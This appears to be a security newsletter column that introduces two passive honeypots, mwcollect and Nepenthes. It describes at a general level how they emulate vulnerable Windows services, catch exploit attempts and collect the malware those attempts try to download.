The last two weeks, I've written about proactive honeypots that seek out malicious Web sites, two of which are unavailable to the public and one that you can download to run on your own networks. If you missed either of those articles, they're available on our Web site at the URLs below. This week, I'll discuss two "passive" honeypots--that is, honeypots that sit waiting for intrusion attempts.
Because honeypots present an attack point for potential intruders, they're useful in determining what sort of intrusion attempts are being launched against your network. In some cases, they can detect intrusion methods that are completely unknown to even the most up-to-date Intrusion Detection Systems (IDSs).
I recently learned about two new honeypots. The first is mwcollect (at the URL below), which was released in April 2005 and is partially funded by The Honeynet Project. Mwcollect is designed specifically to collect malware--thus the "mw" prefix in the mwcollect name. The tool runs on Linux and OpenBSD and can also run on Cygwin, a Linux environment that runs on Windows platforms.
Mwcollect is a little different from typical honeypots because it was originally designed to collect bot software, but the current version collects worms and other forms of malware that take advantage of vulnerabilities that mwcollect exposes. According to the mwcollect Web site, systems that run the tool can't be infected with malware due to the way mwcollect operates internally. It binds to specified ports, waits for an exploit attempt, scans for shell code, and tries to download any related malware. Captured malware can then be added to a database at the mwcollect Web site.
The next version of mwcollect will allow three levels of network interactivity. The first level is the same as I describe above. The second level will passively analyze network traffic (like a sniffer in promiscuous mode would) and will try to download any related malware. The third or lowest level of interactivity will also passively analyze network traffic but won't try to download related malware. You can learn a little more about the tool at the Web site, and join in an Internet Relay Chat (IRC) for further discussion.
The second new honeypot, Nepenthes, was released earlier this month and is similar to mwcollect. It too presents known vulnerabilities to the network and waits for intrusion attempts. Current modules for Nepenthes allow it to emulate problems with DCOM, Local Security Authority Service (LSASS), WINS, ASN1, NetBIOS, SQL Server, and a lot more Microsoft services. Because Nepenthes runs on Linux systems, none of those services would actually be available, which means exploits against them would have little or no effect on the underlying OS.
Just like mwcollect, when Nepenthes detects intrusion attempts, it tries to download any related malware through a variety of methods including FTP, Trivial FTP (TFTP), and HTTP. Captured malware is then sent to a center server hosted by the developers of the tool.
Documentation for Nepenthes doesn't explain what goes on under the hood. But as best I can determine (I haven't actually installed the tool yet), it captures shell-code exploits; looks for instructions that try to download code from the Internet (which many types of malware have); and if it finds such instructions, proceeds to try to download the malware in accordance with the intruder's intent--for example, if the captured code indicates that the system should use FTP to download a file, Nepenthes will try to do that. I suspect that mwcollect works in a similar fashion. Nepenthes doesn't appear to run on Windows platforms using Cygwin, so you'll probably need a Linux-based system to put it to use on your networks.
If you use honeypots as do so many administrators these days, be sure to take a closer look at mwcollect and Nepenthes.